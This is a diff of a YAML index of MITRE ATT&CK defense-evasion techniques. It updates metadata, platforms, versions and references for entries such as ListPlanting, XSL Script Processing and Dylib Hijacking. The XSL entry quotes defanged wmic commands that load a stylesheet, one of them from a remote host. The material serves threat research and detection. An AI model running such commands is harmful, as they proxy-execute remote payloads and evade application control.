-        used to display collections of items.(Citation: Microsoft List View Controls)
-        Information about an application's list-view settings are stored within the
-        process' memory in a <code>SysListView32</code> control.\n\nListPlanting (a
-        form of message-passing \"shatter attack\") may be performed by copying code
-        into the virtual address space of a process that uses a list-view control
-        then using that code as a custom callback for sorting the listed items.(Citation:
-        Modexp Windows Process Injection) Adversaries must first copy code into the
-        target process’ memory space, which can be performed various ways including
-        by directly obtaining a handle to the <code>SysListView32</code> child of
-        the victim process window (via Windows API calls such as <code>FindWindow</code>
+        code in the address space of a separate live process.(Citation: Hexacorn Listplanting)
+        Code executed via ListPlanting may also evade detection from security products
+        since the execution is masked under a legitimate process.\n\nList-view controls
+        are user interface windows used to display collections of items.(Citation:
+        Microsoft List View Controls) Information about an application's list-view
+        settings are stored within the process' memory in a <code>SysListView32</code>
+        control.\n\nListPlanting (a form of message-passing \"shatter attack\") may
+        be performed by copying code into the virtual address space of a process that
+        uses a list-view control then using that code as a custom callback for sorting
+        the listed items.(Citation: Modexp Windows Process Injection) Adversaries
+        must first copy code into the target process’ memory space, which can be performed
+        various ways including by directly obtaining a handle to the <code>SysListView32</code>
+        child of the victim process window (via Windows API calls such as <code>FindWindow</code>
         and/or <code>EnumWindows</code>) or other [Process Injection](https://attack.mitre.org/techniques/T1055)
         methods.\n\nSome variations of ListPlanting may allocate memory in the target
         process but then use window messages to copy the payload, to avoid the use
@@ -13342,6 +13599,9 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_contributors:
+      - ESET
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitoring Windows API calls indicative of the various types
         of code injection may generate a significant amount of data and may not be
         directly useful for defense unless collected under specific circumstances
@@ -13356,21 +13616,52 @@ defense-evasion:
         arguments.\n\nAnalyze process behavior to determine if a process is performing
         unusual actions, such as opening network connections, reading files, or other
         suspicious actions that could relate to post-compromise behavior. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Process: Process Modification'
       - 'Process: OS API Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
+      created: '2021-11-22T15:02:15.190Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1055/015
+        external_id: T1055.015
+      - source_name: Hexacorn Listplanting
+        description: Hexacorn. (2019, April 25). Listplanting – yet another code injection
+          trick. Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2019/04/25/listplanting-yet-another-code-injection-trick/
+      - source_name: ESET InvisiMole June 2020
+        description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
+          HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
+        url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
+      - source_name: Microsoft List View Controls
+        description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
+          January 4, 2022.
+        url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
+      - source_name: Modexp Windows Process Injection
+        description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
+          Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
+          Retrieved November 15, 2021.'
+        url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1055.015
     atomic_tests: []
   T1484:
     technique:
-      modified: '2024-04-19T04:27:31.884Z'
+      modified: '2024-10-15T15:55:32.946Z'
       name: Domain or Tenant Policy Modification
       description: "Adversaries may modify the configuration settings of a domain
         or identity tenant to evade defenses and/or escalate privileges in centrally
@@ -13415,9 +13706,8 @@ defense-evasion:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - SaaS
-      x_mitre_version: '3.0'
+      - Identity Provider
+      x_mitre_version: '3.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Deletion'
       - 'Active Directory: Active Directory Object Creation'
@@ -13474,8 +13764,8 @@ defense-evasion:
         url: https://wald0.com/?p=179
       - source_name: Harmj0y Abusing GPO Permissions
         description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
-          March 5, 2019.
-        url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+          September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
       - source_name: Sygnia Golden SAML
         description: Sygnia. (2020, December). Detection and Hunting of Golden SAML
           Attack. Retrieved January 6, 2021.
@@ -13484,57 +13774,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1220:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Avneet Singh
-      - Casey Smith
-      - Praetorian
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3
-      created: '2018-10-17T00:14:20.652Z'
-      x_mitre_version: '1.2'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1220
-        url: https://attack.mitre.org/techniques/T1220
-      - source_name: Reaqta MSXSL Spearphishing MAR 2018
-        url: https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/
-        description: Admin. (2018, March 2). Spear-phishing campaign leveraging on
-          MSXSL. Retrieved July 3, 2018.
-      - source_name: Twitter SquiblyTwo Detection APR 2018
-        url: https://twitter.com/dez_/status/986614411711442944
-        description: Desimone, J. (2018, April 18). Status Update. Retrieved July
-          3, 2018.
-      - source_name: LOLBAS Wmic
-        url: https://lolbas-project.github.io/lolbas/Binaries/Wmic/
-        description: LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.
-      - source_name: Microsoft msxsl.exe
-        url: https://www.microsoft.com/download/details.aspx?id=21714
-        description: Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe).
-          Retrieved July 3, 2018.
-      - source_name: Penetration Testing Lab MSXSL July 2017
-        url: https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
-        description: netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved
-          July 3, 2018.
-      - source_name: XSL Bypass Mar 2019
-        url: https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75
-        description: Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to
-          Proxy Code Execution. Retrieved August 2, 2019.
-      - source_name: Microsoft XSLT Script Mar 2017
-        url: https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
-        description: Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting
-          Using <msxsl:script>. Retrieved July 3, 2018.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-09-12T19:40:12.337Z'
+      name: XSL Script Processing
       description: |-
         Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)
 
@@ -13552,29 +13796,73 @@ defense-evasion:
 
         * Local File: <code>wmic process list /FORMAT:evil[.]xsl</code>
         * Remote File: <code>wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”</code>
-      modified: '2022-05-24T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: XSL Script Processing
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Avneet Singh
+      - Casey Smith
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Use process monitoring to monitor the execution and arguments of msxsl.exe and wmic.exe. Compare recent invocations of these utilities with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity (ex: URL command line arguments, creation of external network connections, loading of DLLs associated with scripting). (Citation: LOLBAS Wmic) (Citation: Twitter SquiblyTwo Detection APR 2018) Command arguments used before and after the script invocation may also be useful in determining the origin and purpose of the payload being loaded.
 
         The presence of msxsl.exe or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.
-      kill_chain_phases:
-      - phase_name: defense-evasion
-        kill_chain_name: mitre-attack
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'Process: Process Creation'
-      x_mitre_system_requirements:
-      - Microsoft Core XML Services (MSXML) or access to wmic.exe
       x_mitre_defense_bypassed:
       - Anti-virus
       - Digital Certificate Validation
       - Application Control
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_system_requirements:
+      - Microsoft Core XML Services (MSXML) or access to wmic.exe
+      type: attack-pattern
+      id: attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3
+      created: '2018-10-17T00:14:20.652Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1220
+        external_id: T1220
+      - source_name: Reaqta MSXSL Spearphishing MAR 2018
+        description: Admin. (2018, March 2). Spear-phishing campaign leveraging on
+          MSXSL. Retrieved July 3, 2018.
+        url: https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/
+      - source_name: Twitter SquiblyTwo Detection APR 2018
+        description: Desimone, J. (2018, April 18). Status Update. Retrieved September
+          12, 2024.
+        url: https://x.com/dez_/status/986614411711442944
+      - source_name: LOLBAS Wmic
+        description: LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.
+        url: https://lolbas-project.github.io/lolbas/Binaries/Wmic/
+      - source_name: Microsoft msxsl.exe
+        description: Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe).
+          Retrieved July 3, 2018.
+        url: https://www.microsoft.com/download/details.aspx?id=21714
+      - source_name: Penetration Testing Lab MSXSL July 2017
+        description: netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved
+          July 3, 2018.
+        url: https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
+      - source_name: XSL Bypass Mar 2019
+        description: Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to
+          Proxy Code Execution. Retrieved August 2, 2019.
+        url: https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75
+      - source_name: Microsoft XSLT Script Mar 2017
+        description: Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting
+          Using <msxsl:script>. Retrieved July 3, 2018.
+        url: https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1220
     atomic_tests: []
   T1564.001:
@@ -13607,7 +13895,7 @@ defense-evasion:
         description: 'Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware.
           Retrieved July 10, 2017.'
         source_name: WireLurker
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-29T22:32:25.985Z'
       name: 'Hide Artifacts: Hidden Files and Directories'
       description: |-
         Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (<code>dir /a</code> for Windows and <code>ls –a</code> for Linux and macOS).
@@ -13635,48 +13923,11 @@ defense-evasion:
       - Host forensic analysis
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1564.001
     atomic_tests: []
   T1578.001:
     technique:
-      x_mitre_platforms:
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1
-      type: attack-pattern
-      created: '2020-06-09T15:33:13.563Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1578.001
-        url: https://attack.mitre.org/techniques/T1578/001
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      - source_name: AWS Cloud Trail Backup API
-        url: https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html
-        description: Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail.
-          Retrieved April 27, 2020.
-      - source_name: Azure - Monitor Logs
-        url: https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor
-        description: Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor.
-          Retrieved May 1, 2020.
-      - source_name: Cloud Audit Logs
-        url: https://cloud.google.com/logging/docs/audit#admin-activity
-        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
-      - source_name: GCP - Creating and Starting a VM
-        url: https://cloud.google.com/compute/docs/instances/create-start-instance#api_2
-        description: Google. (2020, April 23). Creating and Starting a VM instance.
-          Retrieved May 1, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T15:53:44.870Z'
       name: Create Snapshot
       description: |-
         An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance](https://attack.mitre.org/techniques/T1578/004) where an adversary may revert to a snapshot to evade detection and remove evidence of their presence.
@@ -13685,6 +13936,9 @@ defense-evasion:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         The creation of a snapshot is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities such as the creation of one or more snapshots and the restoration of these snapshots by a new user account.
 
@@ -13693,20 +13947,51 @@ defense-evasion:
         In Azure, the creation of a snapshot may be captured in Azure activity logs. Backup restoration events can also be detected through Azure Monitor Log Data by creating a custom alert for completed restore jobs.(Citation: Azure - Monitor Logs)
 
         Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of the <code>gcloud compute instances create</code> command to create a new VM disk from a snapshot.(Citation: Cloud Audit Logs) It is also possible to detect the usage of the GCP API with the <code>"sourceSnapshot":</code> parameter pointed to <code>"global/snapshots/[BOOT_SNAPSHOT_NAME]</code>.(Citation: GCP - Creating and Starting a VM)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Snapshot: Snapshot Creation'
       - 'Snapshot: Snapshot Metadata'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1
+      created: '2020-06-09T15:33:13.563Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1578/001
+        external_id: T1578.001
+      - source_name: AWS Cloud Trail Backup API
+        description: Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail.
+          Retrieved April 27, 2020.
+        url: https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html
+      - source_name: GCP - Creating and Starting a VM
+        description: Google. (2020, April 23). Creating and Starting a VM instance.
+          Retrieved May 1, 2020.
+        url: https://cloud.google.com/compute/docs/instances/create-start-instance#api_2
+      - source_name: Cloud Audit Logs
+        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+        url: https://cloud.google.com/logging/docs/audit#admin-activity
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      - source_name: Azure - Monitor Logs
+        description: Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor.
+          Retrieved May 1, 2020.
+        url: https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1550.001:
     technique:
-      modified: '2024-04-12T21:18:28.848Z'
+      modified: '2024-10-15T15:38:11.583Z'
       name: Application Access Token
       description: "Adversaries may use stolen application access tokens to bypass
         the typical authentication process and access restricted accounts, information,
@@ -13763,6 +14048,7 @@ defense-evasion:
       - Dylan Silva, AWS Security
       - Jack Burns, HubSpot
       - Blake Strom, Microsoft Threat Intelligence
+      - Pawel Partyka, Microsoft Threat Intelligence
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor access token activity for abnormal use and permissions
         granted to unusual or suspicious applications and APIs. Additionally, administrators
@@ -13773,13 +14059,12 @@ defense-evasion:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
       - Containers
       - IaaS
-      - Azure AD
-      x_mitre_version: '1.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.7'
       x_mitre_data_sources:
       - 'Web Credential: Web Credential Usage'
       x_mitre_defense_bypassed:
@@ -13838,11 +14123,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.004:
     technique:
-      modified: '2024-03-29T15:42:13.499Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Cloud Accounts'
       description: "Valid accounts in cloud environments may allow adversaries to
         perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -13882,8 +14166,10 @@ defense-evasion:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
         or malicious behavior, such as accessing information outside of the normal
@@ -13891,13 +14177,13 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.7'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.8'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -13928,9 +14214,6 @@ defense-evasion:
         url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.004
     atomic_tests:
     - name: Creating GCP Service Account and Service Account Key
@@ -14049,7 +14332,7 @@ defense-evasion:
         Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.
 
         Like other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-04T14:52:51.290Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Environmental Keying
       x_mitre_detection: Detecting the use of environmental keying may be difficult
@@ -14071,11 +14354,10 @@ defense-evasion:
       - Static File Analysis
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1564.004:
     technique:
-      modified: '2024-02-14T21:56:34.831Z'
+      modified: '2024-09-12T15:27:29.615Z'
       name: 'Hide Artifacts: NTFS File Attributes'
       description: |-
         Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)
@@ -14142,8 +14424,8 @@ defense-evasion:
           Retrieved March 21, 2018.
         url: https://blogs.technet.microsoft.com/askcore/2013/03/24/alternate-data-streams-in-ntfs/
       - source_name: Microsoft File Streams
-        description: Microsoft. (n.d.). File Streams. Retrieved December 2, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa364404
+        description: Microsoft. (n.d.). File Streams. Retrieved September 12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/fileio/file-streams
       - source_name: Oddvar Moe ADS2 Apr 2018
         description: Moe, O. (2018, April 11). Putting Data in Alternate Data Streams
           and How to Execute It - Part 2. Retrieved June 30, 2018.
@@ -14161,7 +14443,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564.004
     atomic_tests: []
   T1055.001:
@@ -14264,12 +14545,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1055.001
     atomic_tests: []
   T1556:
     technique:
-      modified: '2024-04-11T21:51:44.851Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Modify Authentication Process
       description: |-
         Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -14282,6 +14562,7 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Chris Ross @xorrior
       x_mitre_deprecated: false
@@ -14318,17 +14599,17 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
       - Network
-      - Azure AD
-      - Google Workspace
       - IaaS
-      - Office 365
       - SaaS
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Process: Process Access'
@@ -14374,9 +14655,6 @@ defense-evasion:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1216:
     technique:
@@ -14414,7 +14692,7 @@ defense-evasion:
         behavior may be abused by adversaries to execute malicious files that could
         bypass application control and signature validation on systems.(Citation:
         GitHub Ultimate AppLocker Bypass List)'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-18T14:43:46.045Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Signed Script Proxy Execution
       x_mitre_detection: Monitor script processes, such as `cscript`, and command-line
@@ -14433,7 +14711,6 @@ defense-evasion:
       - Digital Certificate Validation
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1216
     atomic_tests: []
   T1556.004:
@@ -14464,7 +14741,7 @@ defense-evasion:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2021-12-14T23:14:26.107Z'
       name: Network Device Authentication
       description: |-
         Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -14488,12 +14765,10 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574.004:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-03-30T21:01:39.601Z'
       name: Dylib Hijacking
       description: |-
         Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with <code>@rpath</code>, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable.  Additionally, if weak linking is used, such as the <code>LC_LOAD_WEAK_DYLIB</code> function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -14577,7 +14852,6 @@ defense-evasion:
         url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1601.002:
     technique:
@@ -14599,7 +14873,7 @@ defense-evasion:
         url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
         description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco
           IOS devices. Retrieved October 19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T17:49:02.660Z'
       name: Downgrade System Image
       description: "Adversaries may install an older version of the operating system
         of a network device to weaken security.  Older operating system versions on
